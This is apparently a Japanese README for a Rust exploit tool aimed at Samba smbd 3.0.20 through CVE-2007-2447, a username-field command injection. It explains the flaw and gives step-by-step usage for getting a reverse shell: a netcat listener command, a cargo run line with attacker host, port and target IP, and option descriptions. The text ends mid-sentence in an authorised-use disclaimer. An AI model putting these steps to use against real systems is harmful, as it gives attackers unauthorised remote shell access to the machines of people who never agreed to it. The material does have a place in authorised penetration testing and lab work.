
Samba smbd 3.0.20-Debian を標的とする CVE-2007-2447 エクスプロイトのスタンドアロン Rust 実装。
CVE-2007-2447 エクスプロイトのスタンドアロン Rust 実装で、Samba smbd 3.0.20-Debian を標的とします。
CVE-2007-2447 は、Samba バージョン 3.0.0 から 3.0.25rc3 におけるコマンドインジェクションの脆弱性です。この脆弱性は SamrChangePassword() 関数に存在し、ユーザー入力を適切にサニタイズしないため、攻撃者は SMB 認証中にユーザー名フィールド内のシェルメタキャラクタを介して任意のコマンドを実行できます。
netcat が利用可能であること(通常はデフォルトでインストールされています)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Set up a netcat listener
nc -lvnp 4444
# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: 攻撃マシンの IP アドレス--lport: リバースシェル接続を受け取るポート--target: 標的マシンの IP アドレスこのツールは、教育および許可されたペネトレーションテストの目的のみに使用されます。責任を持って、所有しているシステム、または明示的な許可を得た